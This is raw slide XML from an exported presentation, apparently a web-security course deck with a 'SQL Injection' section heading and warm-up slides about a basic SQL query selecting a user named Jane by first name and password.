      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1418" name="Google Shape;1418;g56c3c4dd97_0_1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56c3c4dd97_0_1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4" name="Shape 1424"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1425" name="Google Shape;1425;g56c3c4dd97_0_1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g56c3c4dd97_0_1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0" name="Shape 1430"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1431" name="Google Shape;1431;g62be7b77d4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62be7b77d4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8" name="Shape 1438"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;g63d53327d6_2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63d53327d6_2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6" name="Shape 1446"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1447" name="Google Shape;1447;g63d53327d6_2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63d53327d6_2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4" name="Shape 1454"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1455" name="Google Shape;1455;g5ea219d93d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5ea219d93d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2" name="Shape 1462"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1463" name="Google Shape;1463;g63d53327d6_2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63d53327d6_2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0" name="Shape 1470"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471" name="Google Shape;1471;g63d53327d6_2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63d53327d6_2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1" name="Shape 1061"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1062" name="Google Shape;1062;g63d53327d6_2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63d53327d6_2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8" name="Shape 1478"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1479" name="Google Shape;1479;g63d53327d6_2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0" name="Google Shape;1480;g63d53327d6_2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6" name="Shape 1486"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1487" name="Google Shape;1487;g63d53327d6_2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63d53327d6_2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4" name="Shape 1494"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1495" name="Google Shape;1495;g63d53327d6_2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6" name="Google Shape;1496;g63d53327d6_2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2" name="Shape 1502"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1503" name="Google Shape;1503;g63d53327d6_2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4" name="Google Shape;1504;g63d53327d6_2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0" name="Shape 1510"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1511" name="Google Shape;1511;g63d53327d6_2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63d53327d6_2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8" name="Shape 1518"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1519" name="Google Shape;1519;g63d53327d6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g63d53327d6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9" name="Shape 1529"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1530" name="Google Shape;1530;g5ea219d93d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1" name="Google Shape;1531;g5ea219d93d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7" name="Shape 1067"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;g63d53327d6_2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63d53327d6_2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5" name="Shape 1075"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1076" name="Google Shape;1076;g63d53327d6_2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63d53327d6_2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1" name="Shape 1081"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;g63d53327d6_2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63d53327d6_2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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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1.pn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2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3.png"/><Relationship Id="rId4"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1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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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34.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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58.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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2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0.png"/><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76.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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1.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8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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3.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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8" name="Google Shape;448;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9" name="Google Shape;449;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0" name="Google Shape;450;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2" name="Google Shape;452;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6"/>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26"/>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26"/>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26"/>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26"/>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464" name="Shape 464"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;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7" name="Google Shape;467;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8" name="Google Shape;468;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0" name="Google Shape;470;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8" name="Google Shape;488;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49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 name="Google Shape;494;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5" name="Google Shape;49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6" name="Google Shape;49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8" name="Google Shape;498;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9" name="Google Shape;499;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06" name="Google Shape;506;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10"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529"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548"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567"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4" name="Google Shape;584;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589"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2" name="Google Shape;592;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3" name="Google Shape;593;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4" name="Google Shape;594;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6" name="Google Shape;596;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2" name="Google Shape;602;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6" name="Google Shape;606;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1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5" name="Google Shape;615;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6" name="Google Shape;616;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8" name="Google Shape;618;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5" name="Google Shape;625;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6" name="Google Shape;626;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8" name="Google Shape;628;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33"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6" name="Google Shape;636;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7" name="Google Shape;637;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8" name="Google Shape;638;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0" name="Google Shape;640;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50" name="Google Shape;650;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655"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9" name="Google Shape;659;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0" name="Google Shape;660;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2" name="Google Shape;662;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0" name="Google Shape;670;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2" name="Google Shape;672;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4" name="Google Shape;674;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680"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4" name="Google Shape;684;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5" name="Google Shape;685;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7" name="Google Shape;687;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8" name="Google Shape;698;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9" name="Google Shape;699;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05"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9" name="Google Shape;70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10" name="Google Shape;710;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2" name="Google Shape;712;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4" name="Google Shape;724;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30"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4" name="Google Shape;734;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5" name="Google Shape;735;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7" name="Google Shape;737;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8" name="Google Shape;748;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9" name="Google Shape;749;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755"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9" name="Google Shape;759;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0" name="Google Shape;760;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2" name="Google Shape;762;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6" name="Google Shape;776;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783"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6" name="Google Shape;786;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7" name="Google Shape;787;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8" name="Google Shape;788;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0" name="Google Shape;790;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2" name="Google Shape;792;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8" name="Google Shape;798;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2" name="Google Shape;802;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4" name="Google Shape;804;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1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5" name="Google Shape;815;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6" name="Google Shape;816;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8" name="Google Shape;818;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4" name="Google Shape;824;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6" name="Google Shape;826;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8" name="Google Shape;828;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2" name="Google Shape;832;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839"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2" name="Google Shape;842;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3" name="Google Shape;843;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4" name="Google Shape;844;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6" name="Google Shape;846;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2" name="Google Shape;852;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8" name="Google Shape;858;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0" name="Google Shape;860;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867" name="Shape 867"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;86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0" name="Google Shape;87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1" name="Google Shape;871;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3" name="Google Shape;873;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6" name="Google Shape;886;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0" name="Google Shape;890;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898" name="Shape 898"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Google Shape;89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1" name="Google Shape;90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9" name="Google Shape;909;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1" name="Google Shape;911;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3" name="Google Shape;913;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1" name="Google Shape;921;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29" name="Shape 929"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;93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2" name="Google Shape;93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2" name="Google Shape;942;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2" name="Google Shape;952;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960" name="Shape 960"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;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3" name="Google Shape;963;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1" name="Google Shape;971;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3" name="Google Shape;973;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5" name="Google Shape;975;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7" name="Google Shape;977;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9" name="Google Shape;979;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3" name="Google Shape;983;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91" name="Shape 991"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="992" name="Google Shape;992;p4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993" name="Google Shape;993;p48"/>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94" name="Google Shape;994;p4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995" name="Shape 995"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="996" name="Google Shape;996;p4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97" name="Google Shape;997;p49"/>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8" name="Google Shape;998;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9" name="Google Shape;999;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0" name="Google Shape;1000;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1" name="Google Shape;1001;p49"/>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2" name="Google Shape;1002;p49"/>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1003" name="Shape 1003"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p5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5" name="Google Shape;1005;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6" name="Google Shape;1006;p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7" name="Google Shape;1007;p50"/>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8" name="Google Shape;1008;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1009" name="Shape 1009"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010" name="Google Shape;1010;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1" name="Google Shape;1011;p51"/>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12" name="Google Shape;1012;p51"/>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51"/>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1014" name="Shape 1014"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015" name="Google Shape;1015;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6" name="Google Shape;1016;p52"/>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17" name="Google Shape;1017;p52"/>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8" name="Google Shape;1018;p52"/>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2"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02.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2" name="Shape 1022"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p53"/>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Web Vulnerabilities 2 Day 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Google Shape;1024;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1440025"/>
            <a:ext cx="8595300" cy="1248000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="457200" lIns="2880350" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p53"/>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p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="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2" name="Shape 1092"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;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Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="883296"/>
            <a:ext cx="9144000" cy="344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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Select all users whose first name is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> whose password is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>asdf772nx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a: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8" name="Shape 1098"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;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Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="883296"/>
            <a:ext cx="9144000" cy="344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3. Select all users whose first name is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and whose password is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>asdf772nx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2785368"/>
            <a:ext cx="9144000" cy="1799100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This query retrieves the record for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
